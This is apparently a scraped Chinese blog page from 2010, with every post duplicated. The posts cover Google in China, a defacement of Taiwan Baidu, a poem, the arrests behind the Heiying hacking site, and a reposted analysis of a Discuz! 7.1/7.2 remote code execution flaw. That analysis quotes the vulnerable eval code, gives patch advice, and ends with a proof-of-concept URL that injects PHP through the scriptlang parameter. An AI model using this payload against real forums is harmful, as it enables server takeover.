Jan
19
谷歌恢复在中国的运营了
人民网北京1月19日电 据法新社消息,当地时间18日下午,在宣布退出中国市场、员工停止工作一周后,美国网络巨头谷歌再次表示在中国的业务恢复正常运转。
“在发表声明之后,我们给公司职员放了一段长假,以便运行测试和扫描,保证网络的安全可靠”,谷歌在回复法新社的询问中说,“谷歌中国的职员现在都已经回到工作岗位,一切业务正常运行。”
上周,新京报报道称谷歌中国的工程师不再能进入公司的全球数据库,不能正常工作。
美国国务院发言人克劳利15日宣布,最早可能在下周初将就谷歌事件向中国发出外交照会。这位发言人说,“它将表达我们对这一事件的关注,并要求中国提供信息,解释这一事件是如何发生的,以及他们准备怎么处理这一问题。”
对此,中国表示谷歌事件不会影响中美关系,但是谷歌必须遵守中国的法律。商务部发言人上周五说,外国公司应该“尊重东道国的法律、公共利益、文化和传统,并为此承担社会责任”。
人民网北京1月19日电 据法新社消息,当地时间18日下午,在宣布退出中国市场、员工停止工作一周后,美国网络巨头谷歌再次表示在中国的业务恢复正常运转。
“在发表声明之后,我们给公司职员放了一段长假,以便运行测试和扫描,保证网络的安全可靠”,谷歌在回复法新社的询问中说,“谷歌中国的职员现在都已经回到工作岗位,一切业务正常运行。”
上周,新京报报道称谷歌中国的工程师不再能进入公司的全球数据库,不能正常工作。
美国国务院发言人克劳利15日宣布,最早可能在下周初将就谷歌事件向中国发出外交照会。这位发言人说,“它将表达我们对这一事件的关注,并要求中国提供信息,解释这一事件是如何发生的,以及他们准备怎么处理这一问题。”
对此,中国表示谷歌事件不会影响中美关系,但是谷歌必须遵守中国的法律。商务部发言人上周五说,外国公司应该“尊重东道国的法律、公共利益、文化和传统,并为此承担社会责任”。
Jan
14
台湾百度被黑 -台湾百度怎么打不开台湾百度公告-台湾百度黑了
台灣百度公告
台灣百度日前遭受有心人士破壞,導致主機系統癱瘓。
為有更好服務與品質,目前正在搶救資料訊息,請網友靜待佳音。
台灣百度非營利網站,請有心人士切勿以私心破壞大眾網友利益為重。
有心人士留言如下
Hello ,I am a Chinese Hacker,sorry to enter your server
I make a mistake that I thange your administrator's password
I am so sorry
you can write mail to me admin@0days.net.cn
My main aim is not doing some bad things.....
台灣百度公告
台灣百度日前遭受有心人士破壞,導致主機系統癱瘓。
為有更好服務與品質,目前正在搶救資料訊息,請網友靜待佳音。
台灣百度非營利網站,請有心人士切勿以私心破壞大眾網友利益為重。
有心人士留言如下
Hello ,I am a Chinese Hacker,sorry to enter your server
I make a mistake that I thange your administrator's password
I am so sorry
you can write mail to me admin@0days.net.cn
My main aim is not doing some bad things.....
Jan
9
寻找一米阴凉
栖息躁动不止的魂
透视这熙攘的街头,还有人群
寻找一米阳光
唤醒几近颓废的心
拥抱生活的美好,或者不美好
寻找一米阴凉
冷静不时冲昏的头
坦对平淡的现实,哪怕碌碌、乃至险阻重重
寻找一米阳光
晾晒隐着孤独的眼神
欣然依旧还在的诚挚,继续追求、哪怕憧憬
栖息躁动不止的魂
透视这熙攘的街头,还有人群
寻找一米阳光
唤醒几近颓废的心
拥抱生活的美好,或者不美好
寻找一米阴凉
冷静不时冲昏的头
坦对平淡的现实,哪怕碌碌、乃至险阻重重
寻找一米阳光
晾晒隐着孤独的眼神
欣然依旧还在的诚挚,继续追求、哪怕憧憬
Jan
7
黑鹰网站打不开 被关了 大米被抓了 小耗子木马
黑鹰的客服说是服务器问题,呵呵都一个多月了没消息,暂时开了个临时论坛 域名 客服的qq号
那临时论坛空间放在美国,大家都知道,国内没证的论坛都关,注册资金100w-盈利性网站(听说广告都不能挂,挂广告就是盈利)
咱们草根站长,呵呵--我有100w,我还忙死忙活的去做网站。额~~
重大的原因是关于小耗子木马吧, 大家都知道 小耗子木马上了cctv...呵呵
http://video.baidu.com/v?ct=301989888&rn=20&pn=0&db=0&s=25&word=%D0%A1%BA%C4%D7%D3%C4%BE%C2%ED
很多相关的视频 是黑鹰的会员。。。。听说和黑鹰有关系 呵呵牵连了吧
黑鹰不低调,还在河南卫视上打广告 ,当然和河南政府部门有关系吧,现在出了问题,河南的不管了。。。呵呵
都怕cctv.记得cctv报光cn域名便宜 让很多人大批量注册,里面说18一个 不便宜呢, 过了2天 就下了命令个人不能注册cn域名
cn域名涨价.
呵呵,也希望黑鹰早日康复吧! 我的博客,www.rootkj.cn 新网不要关我玉米!
下面copy一个新浪的文章
2名男子出售黑客软件获利数百万被捕2010年01月07日11:44 汉网-武汉晚报
本报讯(记者 刘丰 通讯员 袁明 饶学兵 王萍 实习生 李学萍)两男子成立公司,专门提供“黑客”软件,吸收1万多名会员,并因此获利数百万元。昨悉,检察机关以涉嫌非法侵入计算机信息系统罪,依法对犯罪嫌疑人李强、张磊批准逮捕。
2006年3月,河南人李强和张磊联合成立了黑鹰科技有限公司,李强任公司董事长兼法人,张磊任公司总经理。二人以向会员提供“黑客”软件技术收取会费,获取非法利益。经侦查机关查明:二人自2007年至2009年10月,利用黑鹰科技公司“黑鹰安全网”提供“灰鸽子”、“小耗子下载者”等非法入侵、控制计算机信息系统程序工具软件供人下载使用,按照年收取200至996元不等数目的会费发展会员,共计发展会员1万余人,获取非法利益数百万元。并致使会员高某、韩某等人为了敲诈他人钱财,铤而走险,利用下载的上述工具攻击麻城市黄金桥开发区一网吧,造成40余家固定IP网络中断达60余小时。
麻城市检察院近日以涉嫌非法侵入计算机信息系统罪,对李强、张磊予以批捕。
黑鹰的客服说是服务器问题,呵呵都一个多月了没消息,暂时开了个临时论坛 域名 客服的qq号
那临时论坛空间放在美国,大家都知道,国内没证的论坛都关,注册资金100w-盈利性网站(听说广告都不能挂,挂广告就是盈利)
咱们草根站长,呵呵--我有100w,我还忙死忙活的去做网站。额~~
重大的原因是关于小耗子木马吧, 大家都知道 小耗子木马上了cctv...呵呵
http://video.baidu.com/v?ct=301989888&rn=20&pn=0&db=0&s=25&word=%D0%A1%BA%C4%D7%D3%C4%BE%C2%ED
很多相关的视频 是黑鹰的会员。。。。听说和黑鹰有关系 呵呵牵连了吧
黑鹰不低调,还在河南卫视上打广告 ,当然和河南政府部门有关系吧,现在出了问题,河南的不管了。。。呵呵
都怕cctv.记得cctv报光cn域名便宜 让很多人大批量注册,里面说18一个 不便宜呢, 过了2天 就下了命令个人不能注册cn域名
cn域名涨价.
呵呵,也希望黑鹰早日康复吧! 我的博客,www.rootkj.cn 新网不要关我玉米!
下面copy一个新浪的文章
2名男子出售黑客软件获利数百万被捕2010年01月07日11:44 汉网-武汉晚报
本报讯(记者 刘丰 通讯员 袁明 饶学兵 王萍 实习生 李学萍)两男子成立公司,专门提供“黑客”软件,吸收1万多名会员,并因此获利数百万元。昨悉,检察机关以涉嫌非法侵入计算机信息系统罪,依法对犯罪嫌疑人李强、张磊批准逮捕。
2006年3月,河南人李强和张磊联合成立了黑鹰科技有限公司,李强任公司董事长兼法人,张磊任公司总经理。二人以向会员提供“黑客”软件技术收取会费,获取非法利益。经侦查机关查明:二人自2007年至2009年10月,利用黑鹰科技公司“黑鹰安全网”提供“灰鸽子”、“小耗子下载者”等非法入侵、控制计算机信息系统程序工具软件供人下载使用,按照年收取200至996元不等数目的会费发展会员,共计发展会员1万余人,获取非法利益数百万元。并致使会员高某、韩某等人为了敲诈他人钱财,铤而走险,利用下载的上述工具攻击麻城市黄金桥开发区一网吧,造成40余家固定IP网络中断达60余小时。
麻城市检察院近日以涉嫌非法侵入计算机信息系统罪,对李强、张磊予以批捕。
Jan
6
首先说一下,漏洞是t00ls核心群传出去的,xhming先去读的,然后我后来读的,读出来的都是代码执行,1月5日夜里11点多钟,在核心群的黑客们的要求下,xhming给了个poc,我给了个exp,确实发现的是同一个问题。截止夜里2点多种我下线,还只有t00ls核心群里几个人知道我给出的exp,可我怎么也想不到,经过半天时间,exp就满天飞了,而且确实出自昨天我的那个版本。
不难想象,exp流传的速度,A与B关系好,A发给B;B与C是好朋友,B发给C...总有人耐不住性子,泄露点风声,于是就人手一份。最受不了的是,竟然有些SB在群里拿来叫卖;实在不想说什么,要叫卖什么时候轮到你?人心不古,以后有的话还是自己藏着吧。
上午漏洞告诉了Saiy,DZ官方的补丁很快就出来了吧。
特别说明:产生漏洞的$scriptlang数组在安装插件后已经初始化,因此有安装插件的用户不受影响。
漏洞介绍:
Discuz!新版本7.1与7.2版本中的showmessage函数中eval中执行的参数未初始化,可以任意提交,从而可以执行任意PHP命令。
漏洞分析:
下面来分析下这个远程代码执行漏洞,这个问题真的很严重,可以直接写shell的:
一、漏洞来自showmessage函数:
function showmessage($message, $url_forward = '', $extra = '', $forwardtype = 0) {
extract($GLOBALS, EXTR_SKIP);//危险的用法,未初始化的变量可以直接带进函数,直接导致了问题产生,from www.oldjun.com
global $hookscriptmessage, $extrahead, $discuz_uid, $discuz_action, $debuginfo, $seccode, $seccodestatus, $fid, $tid, $charset, $show_message, $inajax, $_DCACHE, $advlist;
define('CACHE_FORBIDDEN', TRUE);
$hookscriptmessage = $show_message = $message;$messagehandle = 0;
$msgforward = unserialize($_DCACHE['settings']['msgforward']);
$refreshtime = intval($msgforward['refreshtime']);
$refreshtime = empty($forwardtype) ? $refreshtime : ($refreshtime ? $refreshtime : 3);
$msgforward['refreshtime'] = $refreshtime * 1000;
$url_forward = empty($url_forward) ? '' : (empty($_DCOOKIE['sid']) && $transsidstatus ? transsid($url_forward) : $url_forward);
$seccodecheck = $seccodestatus & 2;
if($_DCACHE['settings']['funcsiteid'] && $_DCACHE['settings']['funckey'] && $funcstatinfo && !IS_ROBOT) {
$statlogfile = DISCUZ_ROOT.'./forumdata/funcstat.log';
if($fp = @fopen($statlogfile, 'a')) {
@flock($fp, 2);
if(is_array($funcstatinfo)) {
$funcstatinfo = array_unique($funcstatinfo);
foreach($funcstatinfo as $funcinfo) {
fwrite($fp, funcstat_query($funcinfo, $message)."\n");
}
} else {
fwrite($fp, funcstat_query($funcstatinfo, $message)."\n");
}
fclose($fp);
$funcstatinfo = $GLOBALS['funcstatinfo'] = '';
}
}
if(!defined('STAT_DISABLED') && STAT_ID > 0 && !IS_ROBOT) {
write_statlog($message);
}
if($url_forward && (!empty($quickforward) || empty($inajax) && $msgforward['quick'] && $msgforward['messages'] && @in_array($message, $msgforward['messages']))) {
updatesession();
dheader("location: ".str_replace('&', '&', $url_forward));
}
if(!empty($infloat)) {
if($extra) {
$messagehandle = $extra;
}
$extra = '';
}
if(in_array($extra, array('HALTED', 'NOPERM'))) {
$discuz_action = 254;
} else {
$discuz_action = 255;
}
include language('messages');
$vars = explode(':', $message);//只要含:就可以了
if(count($vars) == 2 && isset($scriptlang[$vars[0]][$vars[1]])) {//两个数字即可,用:分割
eval("\$show_message = \"".str_replace('"', '\"', $scriptlang[$vars[0]][$vars[1]])."\";");//$scriptlang未初始化,可以自定义,from www.oldjun.com
} elseif(isset($language[$message])) {
$pre = $inajax ? 'ajax_' : '';
eval("\$show_message = \"".(isset($language[$pre.$message]) ? $language[$pre.$message] : $language[$message])."\";");
unset($pre);
}
......
}
二、DZ的全局机制导致了未初始化的参数可以任意提交:
foreach(array('_COOKIE', '_POST', '_GET') as $_request) {
foreach($$_request as $_key => $_value) {
$_key{0} != '_' && $$_key = daddslashes($_value);
}
}
三、misc.php正好有个可以自定义message的点,其实也是未初始化:
elseif($action == 'imme_binding' && $discuz_uid) {
if(isemail($id)) {
$msn = $db->result_first("SELECT msn FROM {$tablepre}memberfields WHERE uid='$discuz_uid'");
$msn = explode("\t", $msn);
$id = dhtmlspecialchars(substr($id, 0, strpos($id, '@')));
$msn = "$msn[0]\t$id";
$db->query("UPDATE {$tablepre}memberfields SET msn='$msn' WHERE uid='$discuz_uid'");
showmessage('msn_binding_succeed', 'memcp.php');
} else {
if($result == 'Declined') {
dheader("Location: memcp.php");
} else {
showmessage($response['result']);//$response没有初始化,可以自定义,from www.oldjun.com
}
}
}
四、漏洞利用:
showmessage函数里$vars = explode(':', $message);然后message可以自己控制,于是就很容易了,参数是两个自定义的数组。
五、漏洞修复:
1.有补丁的打补丁;
2.没有补丁可以暂时先注释引起漏洞的语句,或者对两个变量赋个值。
poc:
(应Saiy的要求,不发exp了!)注册一个用户登陆,然后提交
misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]={${phpinfo()}}
rn原文来自:http://bbs.rilone.com
不难想象,exp流传的速度,A与B关系好,A发给B;B与C是好朋友,B发给C...总有人耐不住性子,泄露点风声,于是就人手一份。最受不了的是,竟然有些SB在群里拿来叫卖;实在不想说什么,要叫卖什么时候轮到你?人心不古,以后有的话还是自己藏着吧。
上午漏洞告诉了Saiy,DZ官方的补丁很快就出来了吧。
特别说明:产生漏洞的$scriptlang数组在安装插件后已经初始化,因此有安装插件的用户不受影响。
漏洞介绍:
Discuz!新版本7.1与7.2版本中的showmessage函数中eval中执行的参数未初始化,可以任意提交,从而可以执行任意PHP命令。
漏洞分析:
下面来分析下这个远程代码执行漏洞,这个问题真的很严重,可以直接写shell的:
一、漏洞来自showmessage函数:
function showmessage($message, $url_forward = '', $extra = '', $forwardtype = 0) {
extract($GLOBALS, EXTR_SKIP);//危险的用法,未初始化的变量可以直接带进函数,直接导致了问题产生,from www.oldjun.com
global $hookscriptmessage, $extrahead, $discuz_uid, $discuz_action, $debuginfo, $seccode, $seccodestatus, $fid, $tid, $charset, $show_message, $inajax, $_DCACHE, $advlist;
define('CACHE_FORBIDDEN', TRUE);
$hookscriptmessage = $show_message = $message;$messagehandle = 0;
$msgforward = unserialize($_DCACHE['settings']['msgforward']);
$refreshtime = intval($msgforward['refreshtime']);
$refreshtime = empty($forwardtype) ? $refreshtime : ($refreshtime ? $refreshtime : 3);
$msgforward['refreshtime'] = $refreshtime * 1000;
$url_forward = empty($url_forward) ? '' : (empty($_DCOOKIE['sid']) && $transsidstatus ? transsid($url_forward) : $url_forward);
$seccodecheck = $seccodestatus & 2;
if($_DCACHE['settings']['funcsiteid'] && $_DCACHE['settings']['funckey'] && $funcstatinfo && !IS_ROBOT) {
$statlogfile = DISCUZ_ROOT.'./forumdata/funcstat.log';
if($fp = @fopen($statlogfile, 'a')) {
@flock($fp, 2);
if(is_array($funcstatinfo)) {
$funcstatinfo = array_unique($funcstatinfo);
foreach($funcstatinfo as $funcinfo) {
fwrite($fp, funcstat_query($funcinfo, $message)."\n");
}
} else {
fwrite($fp, funcstat_query($funcstatinfo, $message)."\n");
}
fclose($fp);
$funcstatinfo = $GLOBALS['funcstatinfo'] = '';
}
}
if(!defined('STAT_DISABLED') && STAT_ID > 0 && !IS_ROBOT) {
write_statlog($message);
}
if($url_forward && (!empty($quickforward) || empty($inajax) && $msgforward['quick'] && $msgforward['messages'] && @in_array($message, $msgforward['messages']))) {
updatesession();
dheader("location: ".str_replace('&', '&', $url_forward));
}
if(!empty($infloat)) {
if($extra) {
$messagehandle = $extra;
}
$extra = '';
}
if(in_array($extra, array('HALTED', 'NOPERM'))) {
$discuz_action = 254;
} else {
$discuz_action = 255;
}
include language('messages');
$vars = explode(':', $message);//只要含:就可以了
if(count($vars) == 2 && isset($scriptlang[$vars[0]][$vars[1]])) {//两个数字即可,用:分割
eval("\$show_message = \"".str_replace('"', '\"', $scriptlang[$vars[0]][$vars[1]])."\";");//$scriptlang未初始化,可以自定义,from www.oldjun.com
} elseif(isset($language[$message])) {
$pre = $inajax ? 'ajax_' : '';
eval("\$show_message = \"".(isset($language[$pre.$message]) ? $language[$pre.$message] : $language[$message])."\";");
unset($pre);
}
......
}
二、DZ的全局机制导致了未初始化的参数可以任意提交:
foreach(array('_COOKIE', '_POST', '_GET') as $_request) {
foreach($$_request as $_key => $_value) {
$_key{0} != '_' && $$_key = daddslashes($_value);
}
}
三、misc.php正好有个可以自定义message的点,其实也是未初始化:
elseif($action == 'imme_binding' && $discuz_uid) {
if(isemail($id)) {
$msn = $db->result_first("SELECT msn FROM {$tablepre}memberfields WHERE uid='$discuz_uid'");
$msn = explode("\t", $msn);
$id = dhtmlspecialchars(substr($id, 0, strpos($id, '@')));
$msn = "$msn[0]\t$id";
$db->query("UPDATE {$tablepre}memberfields SET msn='$msn' WHERE uid='$discuz_uid'");
showmessage('msn_binding_succeed', 'memcp.php');
} else {
if($result == 'Declined') {
dheader("Location: memcp.php");
} else {
showmessage($response['result']);//$response没有初始化,可以自定义,from www.oldjun.com
}
}
}
四、漏洞利用:
showmessage函数里$vars = explode(':', $message);然后message可以自己控制,于是就很容易了,参数是两个自定义的数组。
五、漏洞修复:
1.有补丁的打补丁;
2.没有补丁可以暂时先注释引起漏洞的语句,或者对两个变量赋个值。
poc:
(应Saiy的要求,不发exp了!)注册一个用户登陆,然后提交
misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]={${phpinfo()}}
rn原文来自:http://bbs.rilone.com
